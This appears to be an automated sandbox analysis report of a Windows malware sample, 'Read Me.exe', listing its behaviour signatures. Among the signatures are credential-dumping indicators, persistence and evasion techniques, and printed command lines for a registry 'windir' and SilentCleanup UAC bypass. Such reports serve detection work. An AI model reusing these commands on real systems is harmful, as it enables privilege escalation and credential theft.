Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe' /stext 'C:\Users\user\AppData\Local\Temp\vnyefbbqt'
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe' /stext 'C:\Users\user\AppData\Local\Temp\gplwytmjpfze'
Source: unknownProcess created: C:\Users\user\Dprg\Dprgest.exe 'C:\Users\user\Dprg\Dprgest.exe'
Source: unknownProcess created: C:\Users\user\Dprg\Dprgees.exe Dprgees.exe
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Users\user\Desktop\Read Me.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
Source: C:\Users\user\Desktop\Read Me.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Natso.bat' 'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add hkcu\Environment /v windir /d 'cmd /c start /min C:\Users\Public\Yako.bat reg delete hkcu\Environment /v windir /f && REM 'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /IJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Users\user\Dprg\Dprgest.exe 'C:\Users\user\Dprg\Dprgest.exe' Jump to behavior
Source: C:\Users\user\Dprg\Dprgest.exeProcess created: C:\Users\user\Dprg\Dprgees.exe Dprgees.exeJump to behavior
Source: C:\Users\user\Dprg\Dprgees.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe' /stext 'C:\Users\user\AppData\Local\Temp\lstte'Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe' /stext 'C:\Users\user\AppData\Local\Temp\vnyefbbqt'Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe' /stext 'C:\Users\user\AppData\Local\Temp\gplwytmjpfze'Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Users\user\Dprg\Dprgest.exe 'C:\Users\user\Dprg\Dprgest.exe' Jump to behavior
Source: C:\Users\user\Dprg\Dprgest.exeProcess created: C:\Users\user\Dprg\Dprgees.exe Dprgees.exeJump to behavior
Source: C:\Users\user\Dprg\Dprgees.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Executable creates window controls seldom found in malwareShow sources
Source: C:\Users\user\Desktop\Read Me.exeWindow found: window name: TMainFormJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
Submission file is bigger than most known malware samplesShow sources
Source: Read Me.exeStatic file information: File size 1390594 > 1048576
Binary contains paths to debug symbolsShow sources
Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: ieinstal.exe, 0000000C.00000003.1191402579.0000000005121000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_004099CD LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,12_2_004099CD
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\Read Me.exeCode function: 0_3_021E83F5 push ecx; mov dword ptr [esp], edx0_3_021E83FA
Source: C:\Users\user\Desktop\Read Me.exeCode function: 0_3_021E6151 push 004114BAh; ret 0_3_021E61BF
Source: C:\Users\user\Desktop\Read Me.exeCode function: 0_3_021E614F push 004114BAh; ret 0_3_021E61BF
Source: C:\Users\user\Desktop\Read Me.exeCode function: 0_3_021FC1A1 push 004274EEh; ret 0_3_021FC1F3
Source: C:\Users\user\Desktop\Read Me.exeCode function: 0_3_021FC1FD push 00427528h; ret 0_3_021FC22D
Source: C:\Users\user\Desktop\Read Me.exeCode function: 0_3_021E8651 push ecx; mov dword ptr [esp], edx0_3_021E8656
Source: C:\Users\user\Desktop\Read Me.exeCode function: 0_3_021E2651 push ecx; mov dword ptr [esp], edx0_3_021E2656
Source: C:\Users\user\Desktop\Read Me.exeCode function: 0_3_021FC649 push 00427968h; ret 0_3_021FC66D
Source: C:\Users\user\Desktop\Read Me.exeCode function: 0_3_021F0671 push 0041BA0Fh; ret 0_3_021F0714
Source: C:\Users\user\Desktop\Read Me.exeCode function: 0_3_021E8771 push ecx; mov dword ptr [esp], edx0_3_021E8776
Source: C:\Users\user\Desktop\Read Me.exeCode function: 0_3_021D8791 push eax; ret 0_3_021D87CD
Source: C:\Users\user\Dprg\Dprgest.exeCode function: 10_2_00404C30 push 00404EDCh; ret 10_2_00404ED4
Source: C:\Users\user\Dprg\Dprgest.exeCode function: 10_2_00404898 push 004048E9h; ret 10_2_004048E1
Source: C:\Users\user\Dprg\Dprgest.exeCode function: 10_2_00408164 push 004082E0h; ret 10_2_004082D8
Source: C:\Users\user\Dprg\Dprgest.exeCode function: 10_2_00402E0C push eax; ret 10_2_00402E48
Source: C:\Users\user\Dprg\Dprgest.exeCode function: 10_2_00404AE0 push 00404B0Ch; ret 10_2_00404B04
Source: C:\Users\user\Dprg\Dprgest.exeCode function: 10_2_004082E2 push 00408353h; ret 10_2_0040834B
Source: C:\Users\user\Dprg\Dprgest.exeCode function: 10_2_004082E4 push 00408353h; ret 10_2_0040834B
Source: C:\Users\user\Dprg\Dprgest.exeCode function: 10_2_00404EB0 push 00404EDCh; ret 10_2_00404ED4
Source: C:\Users\user\Dprg\Dprgest.exeCode function: 10_2_0040835C push 0040838Ah; ret 10_2_00408382
Source: C:\Users\user\Dprg\Dprgest.exeCode function: 10_2_00408364 push 0040838Ah; ret 10_2_00408382
Source: C:\Users\user\Dprg\Dprgest.exeCode function: 10_2_00405B68 push ecx; mov dword ptr [esp], eax10_2_00405B69
Source: C:\Users\user\Dprg\Dprgest.exeCode function: 10_2_00404B18 push 00404B44h; ret 10_2_00404B3C
Source: C:\Users\user\Dprg\Dprgest.exeCode function: 10_2_00404BF6 push 00404C24h; ret 10_2_00404C1C
Source: C:\Users\user\Dprg\Dprgest.exeCode function: 10_2_00404BF8 push 00404C24h; ret 10_2_00404C1C
Source: C:\Users\user\Dprg\Dprgees.exeCode function: 11_3_022A83F5 push ecx; mov dword ptr [esp], edx11_3_022A83FA
Source: C:\Users\user\Dprg\Dprgees.exeCode function: 11_3_022BD0FD push 0042843Ch; ret 11_3_022BD141
Source: C:\Users\user\Dprg\Dprgees.exeCode function: 11_3_022A6151 push 004114BAh; ret 11_3_022A61BF
Source: C:\Users\user\Dprg\Dprgees.exeCode function: 11_3_022BC1A1 push 004274EEh; ret 11_3_022BC1F3
Source: C:\Users\user\Dprg\Dprgees.exeCode function: 11_3_022BC1FD push 00427528h; ret 11_3_022BC22D
Source: C:\Users\user\Dprg\Dprgees.exeCode function: 11_3_022B0671 push 0041BA0Fh; ret 11_3_022B0714

Persistence and Installation Behavior:

barindex
Uses cmd line tools excessively to alter registry or file dataShow sources
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Contains functionality to download and launch executablesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040D427 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_0040D427
Drops PE filesShow sources
Source: C:\Users\user\Desktop\Read Me.exeFile created: C:\Users\user\Dprg\Dprgest.exeJump to dropped file
Source: C:\Users\user\Desktop\Read Me.exeFile created: C:\Users\user\Dprg\Dprgees.exeJump to dropped file

Boot Survival:

barindex
Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Contains functionality to start windows servicesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_004111A9 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_004111A9
Creates an autostart registry keyShow sources
Source: C:\Users\user\Desktop\Read Me.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run DprgJump to behavior
Source: C:\Users\user\Desktop\Read Me.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run DprgJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Extensive use of GetProcAddress (often used to hide API calls)Show sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_004099CD LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,12_2_004099CD
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Yara detected Windows Security DisablerShow sources
Source: Yara matchFile source: 00000000.00000002.1135356388.0000000004500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.1134075626.0000000002861000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.1135662332.0000000004555000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.1186600098.0000000002950000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000B.00000002.1154553390.0000000002CB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.1187696385.00000000041F8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000B.00000002.1154088680.0000000002A08000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Read Me.exe PID: 3156, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Dprgees.exe PID: 4032, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Dprgees.exe PID: 5088, type: MEMORY
Source: Yara matchFile source: C:\Users\Public\Yako.bat, type: DROPPED
Source: Yara matchFile source: 18.2.Dprgees.exe.2950000.4.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.Read Me.exe.4500000.6.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 11.2.Dprgees.exe.2cb0000.4.raw.unpack, type: UNPACKEDPE
Found stalling execution ending in API Sleep callShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeStalling execution: Execution stalls by calling Sleepgraph_12-6140
Contains functionality to enumerate running servicesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: OpenSCManagerA,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,EnumServicesStatusW,EnumServicesStatusW,GetLastError,malloc,EnumServicesStatusW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,OpenServiceW,QueryServiceConfigW,GetLastError,malloc,QueryServiceConfigW,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,CloseServiceHandle,free,CloseServiceHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_00410E72
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)Show sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeWindow / User API: threadDelayed 725Jump to behavior
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 4824Thread sleep count: 725 > 30Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 4824Thread sleep time: -7250000s >= -30000sJump to behavior
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeLast function: Thread delayed
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeLast function: Thread delayed
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)Show sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040504A GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040506Fh12_2_0040504A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040504A GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040506Fh12_2_0040504A
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Dprg\Dprgest.exeCode function: 10_2_00404268 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,10_2_00404268
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040740F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_0040740F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_004104E0 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_t12_2_004104E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00407183 Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_t